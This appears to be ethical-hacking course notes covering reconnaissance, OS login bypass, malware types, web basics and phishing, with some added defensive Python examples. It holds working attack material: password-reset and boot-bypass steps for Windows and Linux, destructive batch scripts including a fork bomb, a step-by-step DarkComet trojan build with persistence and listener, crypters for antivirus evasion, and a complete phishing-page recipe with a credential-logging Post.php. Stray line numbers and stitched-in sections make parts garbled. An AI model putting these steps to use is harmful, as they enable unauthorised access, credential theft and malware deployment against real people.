2. NETWORK BASED INFORMATION GATHERING
=======================================
It tells us the information about the clients connected to a particular network. This phase of Information Gathering tells us the IP Addresses and the MAC addresses along with other details like the OS, the Services they are using and the Ports they are using.

Tools - AngryIPScanner, SoftPerfect Network Scanner, Cain & Abel, Nmap etc.

Advanced tools - GFI LanGuard, Nmap (These will be followed later on).

3. INDIVIDUAL INFORMATION GATHERING
===================================
We collect data and information about a specific person who can be at any location. This can be done through multiple tools.

Other ways of Information Gathering
===================================

Human Specific -

 Social Network
 Social Networking Websites
 LinkedIn
 Twitter
 Facebook
 Dating Websites
 Matrimonial Websites
 Job Portals
 Fake Surveys
 Spy Services

= Through some Social Networking Sites : facebook, instagram, twitter, gmail+, linkedin - resume, contact details etc.

= Through some Smart Applications : Truecaller, Hackode etc.

= Through Online Portals : Shaadi.com, Naukri.com, Shine.com, Indeed.com, jantakhoj.com, pipl etc.

= Through some fake emails : https://temp-mail.org/ , https://www.guerrillamail.com/inbox

= Through some Tools : Maltego, HTTrack - Website Copier etc.

------------------------------------------------------------------------

Digital Footprinting
======================
Digital Footprinting is the process in which we leave some traces and tracks, or in other words "footprints", of ourselves while using some internet services, and these traces and tracks remain on the internet. This information can be transmitted online, such as forum registration, e-mails, uploading videos or digital images etc.

------------------------------------------------------------------------

OS LOGIN BYPASS
================
Nowadays everyone uses an OS login on their Machine, and so does our Victim. These steps will tell you, on the basis of scenarios, how to enter and crack into a particular operating system.


Types Of Passwords
===================

1. Power On Password : This is the authentication used before booting up the system; it starts when we press the power button.

2. BIOS / Supervisor Password : BIOS authentication occurs when we boot up our machine and before our OS is ready.

3. OS Passwords : These Passwords are nowadays the most used and the most cracked by attackers.


METHODS OF OS LOGIN BYPASS
===========================

1. Online Method : This method is carried out when the Operating Machine of the Victim is running and active. We crack the password or create a new user while not knowing the current password.

SAM
===
SAM stands for Security Accounts Manager. It is a file in the Windows Operating System which carries all the users' passwords, but encrypted as NTLM Hashes.

C:\Windows\System32\SAM

LOCAL GROUP POLICY USER EDITOR
==============================
It is a console given by Microsoft which helps in accessing all the user account configuration in Windows Operating Systems.

STEPS
=====

= My Computer > Right Click > Manage
= Local Users and Groups > Right Click > Create New User
= Enter the details of the new user

THROUGH CMD
===========

= CMD > net user
= CMD > net user username *
= Restart


Alternative for protecting against the Online Method :

SYSKEY
======
It is a technology which enables a level of authentication and encrypts your SAM file with 128-bit RC4 encryption.
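The hashes kept in the SAM are NT hashes, which carry no salt, and the "Rainbow Table" item in the Task below is about exactly that weakness: an unsalted hash can be precomputed once for a wordlist and then recovered by lookup. The Python below is an added example for this edit, not from the notes, and it illustrates the mechanism with generic SHA-256 and PBKDF2 rather than the NT hash format: a plain precomputed lookup table (the uncompressed form of what a rainbow table stores more compactly) beside the salted, iterated, constant-time-compared storage that defeats it. The four-entry wordlist is constructed.

```python
# Added example (not part of the original notes): why a stored password hash
# without a salt can be recovered from a precomputed (rainbow-style) table,
# and how a per-user salt plus a slow KDF defeats that. Uses generic SHA-256
# and PBKDF2 for illustration; it does not compute the NT hash format itself.
import hashlib
import hmac
import os

COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein"]   # constructed tiny wordlist


def unsalted_hash(password: str) -> str:
    """Same password -> same digest, for every user, on every machine."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_lookup_table(wordlist) -> dict:
    """Precompute digest -> password once; afterwards recovery is a dictionary lookup."""
    return {unsalted_hash(password): password for password in wordlist}


def table_lookup(table: dict, stored_hash: str):
    return table.get(stored_hash)       # None when the hash was not precomputed


def salted_hash(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """PBKDF2-HMAC-SHA256: the salt makes every user's digest unique, the
    iteration count makes each guess expensive."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def store_password(password: str) -> dict:
    salt = os.urandom(16)               # fresh random salt per account
    return {"salt": salt, "hash": salted_hash(password, salt)}


def verify_password(record: dict, candidate: str) -> bool:
    """Constant-time comparison so timing does not leak how many bytes matched."""
    return hmac.compare_digest(record["hash"], salted_hash(candidate, record["salt"]))


if __name__ == "__main__":
    table = build_lookup_table(COMMON_PASSWORDS)
    print("unsalted lookup:", table_lookup(table, unsalted_hash("qwerty")))
    alice, bob = store_password("qwerty"), store_password("qwerty")
    print("salted digests differ:", alice["hash"] != bob["hash"])
    print("salted lookup:", table_lookup(table, alice["hash"].hex()))
    print("verify:", verify_password(alice, "qwerty"), verify_password(alice, "qwerty1"))
```

Two accounts with the same password get different salted digests, so a table built in advance finds neither, and the attacker is pushed back to guessing per account at the KDF's cost per guess.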


2. OFFLINE METHOD
==================
This is the scenario where the Machine of the Victim is already locked and we don't know the password. We access the machine through some Third Party tools such as Hiren Boot or Kon Boot etc.

LIVE OPERATING SYSTEMS
======================
Normally an OS loads from the internal storage which is located inside your Machine only. Live Operating Systems are those which are installed or placed on some kind of external storage like CD, DVD, USB etc.

Requirements
============
== Make a bootable USB with some bootable-media software like Rufus and install Kon Boot or Hiren Boot on it.
== Plug the USB Drive into the Victim's Machine for getting access to the machine.


ALTERNATIVE FOR THE OFFLINE METHOD : BIOS LOCK - But it can be cracked by removing the BIOS Chip or with the tool OPHcrack.

-------------------------------------------------------------------------------

Bypassing Login of Kali Linux :

Linux : Bypassing Kali Linux Password
Step 1: Select Recovery Mode, Press E
Step 2: Change ro to rw and add init=/bin/bash at the end of the line and Press F10
Step 3: Reset the password by typing passwd root and press enter
Step 4: Type the new password and restart the system

-------------------------------------------------------------------------------

Bypassing Ubuntu System Password :

Step 1: Go to Safe mode
Step 2: Recovery Mode
Step 3: Select the second last option from the list i.e. SHELL
Step 4: type passwd root
Step 5: Give the new password and confirm the password and restart the machine.
Step 6: Fill in the new password


SAM FILE CRACKING VIA CAIN N ABEL : https://lucideustech.blogspot.com/2018/05/sam-file-decryption-with-cain-n-abel.html


TASK
====

1. Rainbow Table
2. Scan a Network through AngryIPScanner and create a Report on it.
3. Scan Information about Saket Modi | Vidit Baxi using Maltego and create a Report of it.
4. How does Torrent Work?



 SESSION 5
 ==========

MALWARES
=========
The term MALWARE derives from "MAL + WARE" which means Malicious Software.
Malwares are the programs, tools or codes that can affect your computer system with or without your permission and can harm you in any way they want. They can be in any format, whether in the form of an image, video, executable file, text file etc.

IMPACT OF MALWARES
==================

= It can steal your data
= Can consume your resources such as Processor, RAM, Hard drive space etc.
= It can do identity theft
= Can take REMOTE CONTROL of your machine
= Can steal your money and confidential data and destroy your machine
= Can create junk files and fill up your Machine etc.

TYPES OF MALWARES
=================

1. Viruses
2. Worms
3. Trojans
4. Ransomwares
5. Adwares
6. Spywares
   6.1 Keyloggers
7. Botnets
8. Rootkits


1. VIRUS
========
VIRUS stands for "Vital Information Resource Under Siege"
These are the implanted codes or programs which need human assistance to initiate or execute so that they can get triggered on a particular machine. They can't replicate without human assistance.

Types
=====
1. Boot Sector Viruses : These are those which are implemented in the BIOS or Boot menu of the machine.
2. Directed Viruses : They just get initiated with the help of self executable codes.
3. Polymorphic Viruses : These are the viruses which change their signature every time they are executed.

"www.virustotal.com"

BATCH FILE VIRUS CREATION
=========================
= which will create a folder

 mkdir hahaha

= create a folder inside a folder ---- infinite times

 :loop
 mkdir test
 cd test
 goto loop

= To Create infinite folders with different names
 :loop
 mkdir %random%
 goto loop

= To Create a file
 echo "hi, you are hacked?">>hack.txt

= Shut Down Virus
 shutdown -s -t 10 -c "Hacked By Grade 1 Hackers"

= To make the system Crash
 :loop
 run cmd.exe
 start notepad.exe
 start calc.exe
 start explorer.exe
 goto loop

= Fork Bomb
 %0|%0

2. WORMS
========
Worms are those malicious softwares which replicate across a network without any human assistance. If an attacker is connected to a network and he/she executes the worm on his/her own machine, it will start its work by replicating.
EG. Stuxnet, Conficker worm

3. TROJANS
===========
A Trojan is a malicious program which gives you remote access to the victim's machine. It is created by RAT Tools (Remote Administration Tools) and we can perform any operation on the Victim machine as we want.

4. RANSOMWARES
==============
Ransomwares are those Malicious Softwares which encrypt all of the data on your personal computer system and ask you for a ransom in terms of digital currency. eg. WannaCry, Petya Ransomwares.
Petya Demonstration

5. ADWARES
==========
These are those malicious softwares which get access to our machine through globally hosted ads.
Eg. Malwares from Torrents

6. SPYWARES
===========
Spywares are those deadly Malicious Softwares which are designed to spy on your Machine, whether located locally or globally.

 6.1 KEYLOGGERS
 ===============
 Keyloggers are the malicious programs which are used to capture the keystrokes of a particular Victim Machine, whether stored globally or locally.

 Eg. Ardamax Keylogger, Family Key Logger - Spyarsenal, Refog KeyLogger

 Categories
 ==========

 Screenshotter : It takes a screenshot on every single keystroke you enter.

 Screenrecorder : It records in the form of videos.

 Key Scrambler : It changes the pattern of the keyboard every time you enter a keystroke.

 Types of Keyloggers
 ===================
 1. Local Based Keyloggers : These are those keyloggers which save the Keystrokes on the Local Machine of the Victim. You have to access the Victim's Machine to capture the Keystrokes.

 2. Server Based/Remote Keyloggers : These are those keyloggers which send the keystrokes to a server through the internet globally. An attacker can access the keystrokes globally by accessing the Keylogger Server.

7. Botnets
==========
Botnets = RoBOT + NETworks
Botnets are those malicious smart programs which run on the network globally and can harm the clients situated on those networks.
893Eg. Zeus Botnet etc.
894
8958. Rootkits
896============
897These are those Malicious programs which get stored in the Kernal level or Boot sector level of the Operating systems.
898
899--------------------------------------------------------------------------------------------------
900
901
902TASKS
903=====
9041. Report on Conficker Worm
9052. Create a DDNS from NOIP
9063. Demonstration of any Local Based Keylogger
907
908
909
 SESSION 6
 =========

TROJANS
=======
Trojans are malicious applications or programs which look like a normal application but are harmful in nature, as they can give the attacker's machine full remote access to the target's machine.

TYPES OF TROJANS ON THE BASIS OF CONNECTION
===========================================

Reverse Connection Trojan : A reverse connection trojan is one in which we don't have to get or know the IP address of the victim's machine. You just have to create a trojan having the attacker's IP address only.

----------------------------------------------------------

DEPLOYING OF TROJAN IN THE TARGET'S MACHINE
===========================================

1. DEPLOYING IN THE SAME NETWORK : The attacker just has to create a Trojan with the IP in the same network where the target is residing.

2. DEPLOYING TROJAN GLOBALLY : In this scenario, an attacker is using a globally hosted DNS with a global IP to get a reverse connection from a target to itself. For eg. Using NOIP and Port Forwarding.

----------------------------------------------------------

RAT
===
RAT stands for Remote Administration Tool. It helps in creating malwares like Trojans and viruses which provide a remote connection to a victim machine without letting the victim know about it.

----------------------------------------------------------

CREATION OF TROJANS
===================

= IP + PORT = Socket
= Stub = The malicious Trojan we make through DarkComet.

1. Left top corner = DarkComet-RAT
2. Go to "Server Module" = Full Editor (expert)
3. Main Settings = Process Mutex
 Mutex = Thread which helps me in sharing the computer's resources
 Random Process Mutex
 Server ID = Same|Change
 Profile Name = Same|Change
4. Go to Network Settings
 Insert the private IP address and a port number (greater than 1200)
 Socket = IP Address + Port Number
 IP Address = Private IP Address --> 192.168.0.28
 Port Number = 1604
 Click on "ADD"
5. Go to "Module Startup" = When my computer starts, what are the things my trojan will do.
 Check the box "Start the stub with windows"
 Drop the stub in:
6. Go to Install Message
 Tick the check box
 Choose the icon
 Enter the message you want the user to be shown
7. Go to Module Shield
8. File Icon
 Choose any file icon from the list.
9. Go to Stub Finalisation
 Build This Stub
 Destination for saving the stub
10. To listen on a specific port
 port = 1604
 In the DarkComet screen, top left corner = DarkComet-RAT = Click on that
 Click on "Listen to new port"
 Enter the port number = 1604 and click on listen


EVADING ANTIVIRUSES AND ANTIMALWARES
====================================

HOW ANTIVIRUSES WORK
====================
Antiviruses and antimalwares work on the definitions, also called signatures, of an application. If they find that the signature of an application is malicious, they declare the application a malware, and if not they declare it a normally running application.
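A definitions-based scanner of the kind described above, added here as an example (not code from the course or from any AV product): it holds a hash definition and two byte-pattern definitions and declares a sample malicious when one matches. The sample files and definition names are constructed; the "malicious" samples are the batch one-liners from the Session 5 notes.

```python
"""A definitions-based scanner: a file is declared malicious when one of the
scanner's stored definitions (signatures) matches it. Two definition types
are shown, a whole-file hash and a byte pattern, so the difference between
them is visible. The sample files and signature names are constructed."""
from __future__ import annotations

import hashlib
import re

# Constructed known-bad sample: the shutdown one-liner from the Session 5 notes.
SHUTDOWN_BAT = b'shutdown -s -t 10 -c "Hacked By Grade 1 Hackers"\r\n'

# Hash definitions: the exact SHA-256 of a file seen before. Cheap and exact,
# but any change to the file, even one byte, produces a different hash.
HASH_SIGNATURES = {
    hashlib.sha256(SHUTDOWN_BAT).hexdigest(): "Demo.ShutdownBat",
}

# Pattern definitions: a byte sequence that identifies a family even when the
# rest of the file differs (here the timeout value may change).
PATTERN_SIGNATURES = {
    "Demo.ShutdownBat": re.compile(rb'shutdown -s -t \d+ -c "Hacked By'),
    "Demo.FolderBomb": re.compile(rb":loop\r?\n\s*mkdir %random%\r?\n\s*goto loop"),
}


def scan(data: bytes) -> list[str]:
    """Return the name of every definition that matches `data`, tagged with
    the definition type, in the order the scanner checks them."""
    hits = []
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_SIGNATURES:
        hits.append(HASH_SIGNATURES[digest] + " (hash)")
    for name, pattern in PATTERN_SIGNATURES.items():
        if pattern.search(data):
            hits.append(name + " (pattern)")
    return hits


# Constructed sample files to scan.
SAMPLES = {
    "shutdown.bat": SHUTDOWN_BAT,
    # Same script with a different timeout: the hash definition no longer
    # matches, but the pattern definition still does.
    "shutdown_v2.bat": SHUTDOWN_BAT.replace(b"-t 10", b"-t 30"),
    "folderbomb.bat": b":loop\r\nmkdir %random%\r\ngoto loop\r\n",
    "notes.txt": b"Session 6: how antiviruses work\r\n",
}


def scan_all(samples: dict[str, bytes]) -> dict[str, list[str]]:
    """Scan every sample and return {filename: [matching definitions]}."""
    return {name: scan(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        verdict = "MALICIOUS: " + ", ".join(hits) if hits else "clean"
        print(f"{name:18} {verdict}")
```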

https://www.youtube.com/watch?v=bTU1jbVXlmM

FUD - Fully Undetectable


CRYPTERS AND BINDERS
====================
Crypters are those applications which act as an extra coating layer on an application, providing their own self-generated "signatures". Eg. Chrome Crypter, Urge Crypter

Binders are those applications which bind a file or a malware into any extension while not changing the functionality of the file type.

Chrome & Urge Crypters = Limbo > Bingo

----------------------------------------------------------

BOTNETS AND ROOTKITS
====================

Botnets means roBOT + NETwork. These are the malicious applications, such as Trojans etc., which run on the network and are intelligent enough to use their own mechanism.

Rootkits
========
Rootkits are those malicious applications or codes which are installed in the boot option, such as the BIOS, and start executing on every startup.

---------------------------------------------------------

SECURE SYSTEM CONFIGURATION
===========================

1. CMD > $ netstat -ona
(This will show all the sockets : IP+Port connections with their states on that particular machine)
 = o stands for outgoing connections
 = n stands for network IPs & ports
 = a stands for all connections

2. CMD > tasklist
 CMD > $ taskkill /PID ___ /F

3. Startup check and maintaining the list of the machine's startup items.

4. Task Manager > Processes > kill the PID (Process ID) of the malicious executable (exe)

5. Checking the firewall status and creating new rule sets. > Outbound Rules & Inbound Rules

6. Services running on the machine.
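Steps 1 and 2 above are done by hand: read the sockets from netstat, then look each PID up in tasklist. The following example (added here, not from the course) does that correlation in code. It parses constructed samples of `netstat -ano` (the same switches as `-ona`) and `tasklist /FO CSV` output in their real Windows formats; on a live machine the two strings would come from `subprocess.run(["netstat", "-ano"], capture_output=True, text=True).stdout` and the same for `tasklist`.

```python
"""Correlate `netstat -ano` output with `tasklist /FO CSV` output so that every
LISTENING or ESTABLISHED socket is shown with the process image that owns it.
Both outputs below are constructed samples; the addresses are private or
documentation ranges and the PIDs and process names are made up."""
from __future__ import annotations

import csv
import io
from dataclasses import dataclass

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:1604           0.0.0.0:0              LISTENING       4120
  TCP    192.168.0.28:49812     192.168.0.5:1604       ESTABLISHED     4120
  TCP    192.168.0.28:49901     203.0.113.10:443       ESTABLISHED     3388
  TCP    127.0.0.1:49700        127.0.0.1:49701        ESTABLISHED     3388
  UDP    0.0.0.0:5353           *:*                                    2260
"""

TASKLIST_SAMPLE = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"svchost.exe","912","Services","0","9,412 K"
"chrome.exe","3388","Console","1","211,004 K"
"svchost.exe","4120","Console","1","12,004 K"
"""


@dataclass(frozen=True)
class Socket:
    proto: str
    local: str
    remote: str
    state: str
    pid: int
    image: str  # process name from tasklist, or "?" if the PID was not listed


def parse_tasklist_csv(text: str) -> dict[int, str]:
    """Map PID -> image name from `tasklist /FO CSV` output."""
    return {int(row["PID"]): row["Image Name"] for row in csv.DictReader(io.StringIO(text))}


def parse_netstat(text: str, processes: dict[int, str]) -> list[Socket]:
    """Parse `netstat -ano` lines into Socket records.

    TCP lines carry five columns (Proto, Local, Foreign, State, PID); UDP lines
    have no State column, so they carry four. Headers, blank lines and anything
    malformed are skipped rather than guessed at."""
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, remote, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, remote, pid = parts
            state = "-"
        else:
            continue
        pid_int = int(pid)
        sockets.append(Socket(proto, local, remote, state, pid_int, processes.get(pid_int, "?")))
    return sockets


def is_loopback(endpoint: str) -> bool:
    return endpoint.startswith("127.") or endpoint.startswith("[::1]")


def review(sockets: list[Socket]) -> dict[str, list[Socket]]:
    """Group sockets the way the checklist wants them reviewed: every port the
    machine listens on, and every established connection to a non-loopback peer."""
    return {
        "listening": [s for s in sockets if s.state == "LISTENING"],
        "established_remote": [
            s for s in sockets if s.state == "ESTABLISHED" and not is_loopback(s.remote)
        ],
    }


def owners_of_port(sockets: list[Socket], port: int) -> set[str]:
    """Which process images own a socket bound to, or connected to, `port`?"""
    return {
        f"{s.image} (PID {s.pid})"
        for s in sockets
        if s.local.rsplit(":", 1)[-1] == str(port) or s.remote.rsplit(":", 1)[-1] == str(port)
    }


if __name__ == "__main__":
    socks = parse_netstat(NETSTAT_SAMPLE, parse_tasklist_csv(TASKLIST_SAMPLE))
    for group, items in review(socks).items():
        print(f"== {group} ==")
        for s in items:
            print(f"  {s.proto} {s.local:22} -> {s.remote:22} {s.state:12} {s.image} (PID {s.pid})")
```

The PID whose connection you cannot explain is the one to check in Task Manager or with `taskkill /PID ... /F` as in step 2.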


TASKS
=====

1. Create a POC by making a stub and getting the remote connection of a machine.
2. Find an application which can see the "Established" and "Listening" connections of a machine just like "netstat".

PHONE NUMBER - 7500901015
EMAIL - sanjeev.m@lucideustech.com



 SESSION 7
 =========

WEB ARCHITECTURE AND COMPONENTS
===============================

1. Domain Name : It is a unique identity in the form of a name which can be accessed globally. eg. google.com ; google.com is a unique identity which helps in accessing the website.

2. Web Hosting Space : The space where we want to build and produce our web application. Eg. GoDaddy, BigRock
ICANN provides these hosting spaces to GoDaddy etc.

3. Operating Systems : On which operating system we want to build our website. Eg. Linux, Windows

4. Server Type : Which type of server we are using to host our website. Request and response of the application.
 Windows - IIS - Information Server
 Linux - Apache Tomcat

5. Web Technology : Which type of web technology we are using to create our website. These are the programming languages in which we create our web application.

 1. Client Side Scripting Language : Which is used to develop the front-end application; the user only accesses the control menu of that programming language.
 Eg. HTML, Java etc.

 2. Server Side Scripting Language : These are those languages which are used for creating and maintaining the server side configuration of a website.
 Eg. PHP, ASP, JSP, PYTHON etc.

The server is the OS which always responds to the requests of clients.
Clients are those which only make requests to the server.

6. Database : A database is that system which stores all the data of a web application we are hosting on a server. It is known as the backbone of the web application, where data is stored in the form of rows and columns.
It helps in storing all the files situated in a database.
Windows - MSSQL
Linux - MySQL, PostgreSQL

SQL - Structured Query Language, which helps us create a database on a server.

But all these resources need money and finance.

-------------------------------------------------------------------

Local Hosting
=============
Local hosting is a technology in which we store and host a database on our "localhost" computer. This website can be hosted and accessed in a LAN or an intranet network.

LOCAL HOST SERVERS
==================
So, they are server applications which take our normal operating system and make it act like a server.

WINDOWS - WAMPP

W - WINDOWS
A - APACHE
M - MSSQL
P - PERL
P - PYTHON

LINUX - LAMMP

L - LINUX
A - APACHE
M - MYSQL
P - PERL
P - PYTHON

XAMPP - Cross Platform Server
X - Cross Platform
A - APACHE
M - MYSQL
P - PERL
P - PYTHON


------------------------------------------------------------------

WEB SECURITY MISCONCEPTIONS
===========================

HTTP / HTTPS - SSL Secured = Secure Socket Layer
 Encryption
 Tunneling
 Secure Socket

= If a website is using https instead of http, it's not secured either.
= If I am using a good firewall then I am secured.
= If I am using IDS and IPS then I am secured.
 IDS = Intrusion Detection System
 IPS = Intrusion Prevention System
------------------------------------------------------------------


SCRIPTING LANGUAGES
===================

Methods used in Scripting Languages
===================================

1. GET = It shows the data which is being travelled from server to client in the URL only. It is the unsecured method of data travelling between client and server.

2. POST = It doesn't show anything in the URL about where that data is travelling from.




Client Side Scripting
=====================
The scripting programming language we are gonna be using is HTML.

HTML
====
Hyper Text Transfer Protocol
 ||
Hyperlinks


This is the application used for creating client side web pages.

HTML PRACTICALS
===============

1. Starting of HTML scripting
<html>
...
... Tells me the code written is in HTML
...
</html>

<head>
..
.. It is used to define the header, like the title of the web page, the name in the tab
</head>

<title> ......
Name of the Title
...</title>

<body>
...
... Used for the content of the web page
...
</body>

5. Heading = Used to provide the heading
<h1> - <h6>
As the number increases the font size decreases.
<h1>Heading</h1>
<h2>Heading</h2>
<h3>Heading</h3>


HTML TAGS
=========

<p> = Paragraph
<br> = Break Statement
<ul> = Helps in indentation
<a href> = Action Hyperlink Reference
<b> = Bold
<button> = Button
<a> = Action
<li> = Line
<ol> = ordered indentation
<h1> = Heading
<img src> = Image Source
<form action> = Form Clicking Action



Basicpage.html
==============
<html>
<head>
<title>Basic</title>
</head>
<body>
<a href="http://www.lucideus.com"><h1>Ethical Hacking</h1></a>
<h2>Black Hat Hacker</h2>
<p>These are the bad guys.<br>
They Just Work For money.<br>
They bring chaos to the cyber world.<br>
Very Very Bad guys.</p>
<h2>White Hat Hacker</h2>
<h3>Script Kiddies</h3>
<h3>N00bZ</h3>
<img src="pooh.jpg">
<form action="secpage.html">
First Name: <input type="text"><br>
Last Name : <input type="text"><br>
Username : <input type="text"><br>
Password : <input type="password"><br>
<input type="submit" value="submit">
</form>
</body>
</html>

============
Secpage.html
============
<html>
<head>
<title>Welcome</title>
</head>
<body>
<h1>Hello user, you are welcome to my web site</h1>
</body>
</html>

-------------------------------------------------------------------------------------

Server Side Scripting
=====================

This language is only used to maintain and configure server side scripting. eg. PHP

XAMPP Server Practical Steps
============================

= After installing,
= Start Apache
= Start MySQL

There are 3 ways of opening a server-hosted file
c:\xampp\htdocs
The file which I want to host, I will place in the htdocs folder.

1. localhost/filename.html
2. 127.0.0.1/filename.html
For opening the same file on other devices which are connected in the LAN
3. IP Address/filename.html


PHP
===
<?php = Shows the start of the PHP code
?> = It is the end of the PHP code
$ = to create a variable

 $_GET
 $_POST


A variable is a datatype in which we are storing a value.
 $number = It is a variable and I can store anything in it.
 For printing = "echo"
 echo "Welcome to Kartik and Sairam"

-----------------------------------------------------------------------------------------

Program of Addition of Two Numbers Through PHP and HTML
=======================================================

HTML CODE =

<html>
<head>
 <title>Hello</title>
</head>
<body>
 <form action="calcc.php" method="post">
 First Number <input type="text" name="first" id="first"><br>
 Sec Number <input type="text" name="sec" id="sec"><br>
 <input type="submit">
 </form>
</body>
</html>

PHP CODE =

<html>
<head>
 <title>add</title>
</head>

<body>
 <?php
$one = $_POST['first'] + 0;
$two = $_POST['sec'] + 0;
$sum = $one + $two;
echo "The sum is ";
echo $sum;
 ?>
</body>
</html>

------------------------------------------------------------------------------------------

TASK
====

1. To make a calculator for addition, subtraction, division and multiplication in HTML and PHP.
2. Cookbook of HTML and PHP including 30 HTML tags and 20 PHP tags with all their functionalities.
3. To create a simple resume in HTML with proper indentation.

------------------------------------------------------------------------------------------



 SESSION 8
 =========

PHISHING ATTACKS
================
Phishing is a type of attack where an attacker creates a malicious web page, globally hosted or locally hosted, which seems legit/normal/original but is made to "phish", i.e. lure the victim into entering sensitive or critical data, which can be of any type, eg. personal or financial, with the help of the phishing attack.

CREATION OF A PHISHING WEBPAGE
==============================
Workflow:
= Opening any social networking website and copying its source code - the scripting code of the web page.
= Creating a PHP page for getting the data from the phishing page.
= A text file to store the data of the phishing page.

Steps :
=======

= Open any legitimate website and right click on it.
= Go to the "View Page Source" option.
= Copy the source code and paste it in a Notepad file.
= Find "Action=" (Action defines the next location the data has to go)
= Replace the field in the above step with Post.php
= Save the copied file as webpage.html
= Create a Post.php file for saving the data we get from the phishing page entered by the victim, and create a new text file through it for saving all the data.
= Save both the files in the localhost server.

Creation of Post.php
====================
<?php // starting of the PHP code
header('Location: https://www.facebook.com'); // redirection to the original webpage
$handle = fopen("log.txt", "a"); // creating a text file log.txt to store data & append to it
foreach ($_POST as $variable => $value) { // loop over every submitted field
 fwrite($handle, $variable); // writing the variable name
 fwrite($handle, "="); // writing the equals sign
 fwrite($handle, $value); // writing the submitted value
 fwrite($handle, "\r\n"); // new line
} // end of loop
fwrite($handle, "\r\n"); // blank line between submissions
fclose($handle); // saving and closing the file named log.txt
exit; // exiting the PHP code
// end of the PHP code
?>


Saving the web phishing code and the Post.php in the same location, in a folder inside the localhost server.

These phishing pages can be globally hosted via 000webhost.com and other open source servers also.
----------------------------------------------------------------------------------------------------------------------------

SOCIAL ENGINEERING
==================
Social Engineering is a term usually used for "hacking done via human minds".
This is the art of manipulating human minds so that they spit out confidential information. This information can be any personal or financial information. This attack is only possible through "human stupidity".
Phishing is a sub-category of social engineering.

YouTube video for Social Engineering : https://www.youtube.com/watch?v=lc7scxvKQOo
Social Engineering Free Pizza → https://www.youtube.com/watch?v=z68gZJwdAAg


----------------------------------------------------------------------------------------------------------------------------

Email Encryption
================
What is encryption?
Encryption is a method which converts plain text data, which is readable and understandable, into an unreadable form of data which is encoded and cannot easily be read by humans.

Email Encryption : When we use the SMTP service and send an email to another person, it uses an end-to-end encryption method which has a public key, a private key and some algorithms.

The public key is that which can be easily accessed from a CA server. A private key is that which the authentication server of the web service generates, and it merges with the public key to complete the encryption process. The algorithm defines the functionality by which an encryption method works.

PGP - Pretty Good Privacy
=========================
Pretty Good Privacy or PGP is a popular program used to encrypt and decrypt email over the Internet, as well as to authenticate messages with digital signatures and encrypt stored files. This encryption format developed by PGP is used by emails and applications like WhatsApp nowadays, which provides end-to-end security.

Website - https://encipher.it/


IDN Homograph Attack
====================

An IDN homograph attack is based on the standards of the modern Internet that allow us to communicate in the various languages used all over the globe. Different languages may contain different but very similar characters. So an attacker lures and pranks a victim with these languages. Eg. of languages - Cyrillic characters

- https://www.irongeek.com/homoglyph-attack-generator.php

What can an attacker do?
========================
Attackers can register their own domain names that are similar to existing web addresses.
Then they can create their own websites that are, again, the same as or very similar to the existing original sites (which usually belong to banks, corporations, email or news services).
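A detector for the look-alike domains this attack relies on, added here as an example (not code from the course): it flags a domain label that mixes scripts (Latin letters next to Cyrillic ones) and shows the punycode name the browser actually resolves. It uses only Python's standard library; the sample domains are constructed.

```python
"""Spot IDN homograph look-alikes: a domain label whose letters come from more
than one script, or whose punycode form differs from what the user sees.
Example code; the sample domains are constructed."""
from __future__ import annotations

import unicodedata

# Scripts we care about, keyed by the prefix unicodedata uses in character names.
SCRIPT_PREFIXES = {"LATIN": "Latin", "CYRILLIC": "Cyrillic", "GREEK": "Greek"}


def script_of(char: str) -> str:
    """Name the script of a letter from its Unicode character name.

    Digits, hyphens and dots are 'Common' and never count towards a script mix."""
    if not char.isalpha():
        return "Common"
    name = unicodedata.name(char, "")
    for prefix, script in SCRIPT_PREFIXES.items():
        if name.startswith(prefix):
            return script
    return "Other"


def to_ascii(domain: str) -> str:
    """The name a browser actually resolves: the IDNA (punycode) form of `domain`."""
    return domain.encode("idna").decode("ascii")


def analyse(domain: str) -> dict:
    """Report whether `domain` looks like a homograph candidate.

    A domain is suspicious when any label mixes scripts, or when its punycode
    form differs from what is displayed at all: a non-ASCII label that *looks*
    ASCII is exactly the trick described above."""
    report = {"domain": domain, "ascii": to_ascii(domain), "labels": []}
    for label in domain.split("."):
        scripts = {script_of(c) for c in label} - {"Common"}
        report["labels"].append({"label": label, "scripts": sorted(scripts)})
    report["mixed_script"] = any(len(l["scripts"]) > 1 for l in report["labels"])
    report["non_ascii"] = report["ascii"] != domain
    report["suspicious"] = report["mixed_script"] or report["non_ascii"]
    return report


# Constructed samples. The second uses Cyrillic 'а' (U+0430) in place of the
# Latin 'a' in "apple", the classic homograph; the third is entirely Cyrillic,
# a legitimate IDN that still resolves to a punycode name the user never sees.
SAMPLES = [
    "apple.com",
    "\u0430pple.com",
    "\u043f\u0440\u0438\u043c\u0435\u0440.com",  # пример.com
]


def suspicious_samples() -> list[str]:
    return [d for d in SAMPLES if analyse(d)["suspicious"]]


if __name__ == "__main__":
    for d in SAMPLES:
        r = analyse(d)
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {d}  ->  {r['ascii']}  scripts={r['labels'][0]['scripts']}")
```

Mail gateways and browsers apply the same idea: show the punycode form, or warn, whenever a label mixes scripts.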
1425
1426----------------------------------------------------------------------------------------------------------------------------
1427
1428Spear Phishing
1429===========
1430Spear Phishing Attacks are those in which a Attacker customize their attack emails with the target’s name, position, company, work phone number and other information in an attempt to trick the recipient into believing that they have a connection with the sender.
1431The goal is the same as normal phishing which is luring the targeted victim into clicking on a malicious URL or email attachment, so that they will hand over their personal data.
1432
1433Eg. Mail from your Boss of your company.
1434
1435- Alchemist
1436----------------------------------------------------------------------------------------------------------------------------
1437
1438Fake Emails
1439=========
